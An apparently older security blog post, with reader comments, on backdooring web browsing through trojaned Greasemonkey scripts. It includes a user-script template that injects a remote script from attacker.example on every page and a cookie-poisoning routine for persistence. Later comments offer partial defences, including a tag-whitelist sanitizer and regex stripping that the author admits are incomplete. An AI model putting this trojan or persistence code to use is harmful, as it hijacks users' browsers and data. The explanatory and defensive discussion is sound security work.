Backdooring Web Pages
The most obvious way to maliciously infect web pages is Cross-Site Scripting (XSS). In practice, XSS vulnerabilities come in two flavours: persistent and non-persistent. Depending on the type, the attacker gains a varying degree of control. The persistent vector produces better results and lasts longer, while the non-persistent vector lasts for a single hit, although the attacker can extend control over the user's browser with other techniques. Here I explore another vector, one that can permanently take control of the user's web experience.
IMHO, there are three types of web page backdoors: non-persistent, persistent and global persistent. Non-persistent backdoors occur on a single XSS-vulnerable page (a single hit). Persistent backdoors are a bit better because they occur on one or more XSS-vulnerable pages, most probably within the same domain (site). Global persistent backdoors occur across all domains (sites) and, in theory, can last forever.
Global persistent backdoors do not rely on the server being vulnerable to XSS or any other server-side vulnerability. Instead, they exploit browser functionality.
In order to install a global persistent backdoor, the attacker can exploit known browser vulnerabilities that allow silent installation of new functionality, exploit known extension vulnerabilities that allow Cross Context Scripting (execution of malicious web content in the browser's privileged context), or exploit the user's trust (trojaning).
The first two scenarios rely on the browser or one of its extensions being vulnerable. Finding such vulnerabilities takes time and may not be feasible, not to mention that once an attacker exploits them, the entire system is probably at the attacker's mercy. The last scenario, on the other hand, tricks the user into performing something seemingly legitimate which in fact turns out to be malicious (trojaning). This is quite an old trick, but a very successful and widely exploited one.
Exploiting the user's trust in order to install a backdoor can be achieved in several ways, each providing a different degree of success. The first is asking the user to install a browser extension. This scenario can succeed in browsers that do not have central extension repositories. In that respect, IE is probably the most vulnerable; Opera, with its Web Widgets, could potentially fall into the same category. Firefox users, on the other hand, tend to install extensions from known sources such as addons.mozilla.org, so they are the least vulnerable.
The second scenario occurs when the attacker asks the user to install an extension of an extension. This one is far more likely to be trusted, since extensions of extensions are believed to be harmless. The Greasemonkey extensions for Firefox and IE, and Opera's Web Widgets, are good examples of this kind of scenario.
To some extent, security-aware users can detect malicious scripts, so they are less vulnerable. The average user, however, trusts the security model of the browser, so a trojaned Greasemonkey script can be installed quite easily. A sample trojaned script can contain something like the following:
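A minimal sketch of what such a trojaned user script might look like (illustrative only: the script name and URL are placeholders, and the injection logic is wrapped in a function so it can be examined in isolation):

```javascript
// ==UserScript==
// @name     Handy Utility   (looks harmless)
// @include  *
// ==/UserScript==

// The "useful" script silently pulls attacker-controlled code into
// every page the user visits. The URL below is a placeholder.
function injectRemote(doc, url) {
  var s = doc.createElement('script');
  s.src = url;
  doc.body.appendChild(s);
  return s;
}

// In a real user script this would simply run as:
// injectRemote(document, 'http://attacker.example/backdoor.js');
```

Because Greasemonkey runs the script on every matched page, one line of injection is enough to hand the whole browsing session to the remote script.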
This type of backdoor has one big problem: once the user finds that the Greasemonkey script (or the Web Widget) is no longer needed, or discovers that it contains malicious code, proper cleaning actions will be taken.
That is good for the user but, like any other malicious code, web page backdoors can secure hidden channels for reinstallation and further propagation. In that respect, the backdoor could perform internal cross-site scripting by poisoning cookies or Flash objects such as the Flash persistent storage model (Local Shared Objects), which is widely used by several AJAX frameworks. Other persistence tricks can be used as well, such as taking advantage of page-caching issues. All of these are related to a discipline known as DOM-based Cross-Site Scripting.
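To sketch the cookie-poisoning channel (the cookie name and payload here are hypothetical), the backdoor can serialize itself into a long-lived cookie; any page on the site that later echoes that cookie into the DOM without encoding will resurrect the payload even after the original script has been removed:

```javascript
// Hypothetical persistence channel: hide the payload in a cookie
// that outlives the removal of the original trojaned script.
function poisonCookie(doc, payload) {
  doc.cookie = 'prefs=' + encodeURIComponent(payload) +
               '; expires=Fri, 01 Jan 2038 00:00:00 GMT; path=/';
}

// A DOM-based XSS sink elsewhere on the site might later read the
// cookie and write it into the page, re-executing the payload.
function readPoisoned(doc) {
  var m = /(?:^|;\s*)prefs=([^;]*)/.exec(doc.cookie);
  return m ? decodeURIComponent(m[1]) : null;
}
```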
- Do you trust what you are mashing up? If not, stop.
- Even if you trust who you are mashing up, do they allow user-generated content into their return results?
- Do you allow user-generated content into your results?
Consider the following snippet:

< script src="http://foobar.com/badscript.js" >

This is valid HTML; the only way to catch it is to parse your HTML before executing it, then whitelist the elements you want to keep. – Brad
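A toy sketch of that whitelist approach (the allow-list is arbitrary, and a real implementation should be built on a proper HTML parser rather than a regular expression):

```javascript
// Keep only explicitly allowed tags; everything else, including
// "< script ...>" variants with stray whitespace, is dropped, and
// attributes are stripped. Toy code only: a production sanitizer
// should use an HTML parser, not a regex.
var ALLOWED = { b: true, i: true, em: true, strong: true, p: true };

function whitelistTags(html) {
  return html.replace(/<\s*(\/?)\s*([a-zA-Z]+)[^>]*>/g,
    function (_match, slash, name) {
      return ALLOWED[name.toLowerCase()] ? '<' + slash + name + '>' : '';
    });
}
```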
Extracting data with a strict pattern such as <age>(\d+)</age> is much more secure than parsing it with a general-purpose parser. You don't need a blacklist or a whitelist: you expect the data to be exactly the way you want it to be, and if it is not, the extraction simply fails. I know that things are usually not that simple. The example above is suitable for data extraction; the harder part is data stripping. However, stripping out special characters is sometimes as simple as the following:

/<|>|&.*?;|(... here more rules ...)/

You can add a few more rules inside. I am far from thinking that these approaches are perfect; the list of possible problems is endless.
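The two approaches above can be sketched as follows (the <age> field and the stripping rules are just examples):

```javascript
// Strict extraction: accept the data only if it has exactly the
// expected shape; anything else fails closed by returning null.
function extractAge(xml) {
  var m = /<age>(\d+)<\/age>/.exec(xml);
  return m ? parseInt(m[1], 10) : null;
}

// Crude stripping pass in the spirit of the rule above.
// Intentionally incomplete: more alternatives can be added.
function stripSpecials(s) {
  return s.replace(/<|>|&.*?;/g, '');
}
```

Note how the extraction variant degrades safely: smuggled markup inside the field simply makes the match fail, instead of slipping through a filter.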